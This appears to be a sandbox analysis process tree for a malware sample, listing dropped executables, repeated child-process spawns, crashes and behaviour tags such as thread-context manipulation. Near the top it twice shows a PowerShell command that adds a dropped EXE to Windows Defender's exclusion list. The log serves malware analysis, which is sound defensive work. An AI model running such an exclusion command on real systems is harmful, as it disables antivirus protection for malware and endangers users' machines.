C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe3⤵
-
-
-
C:\Users\Admin\Documents\o9bhD_cFtB6ZOF1w10k76AMZ.exe"C:\Users\Admin\Documents\o9bhD_cFtB6ZOF1w10k76AMZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe"C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1644⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9920 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
C:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exeC:\Users\Admin\Documents\41qquykCPBvzT0C9LSCnJdjf.exe3⤵
-
-
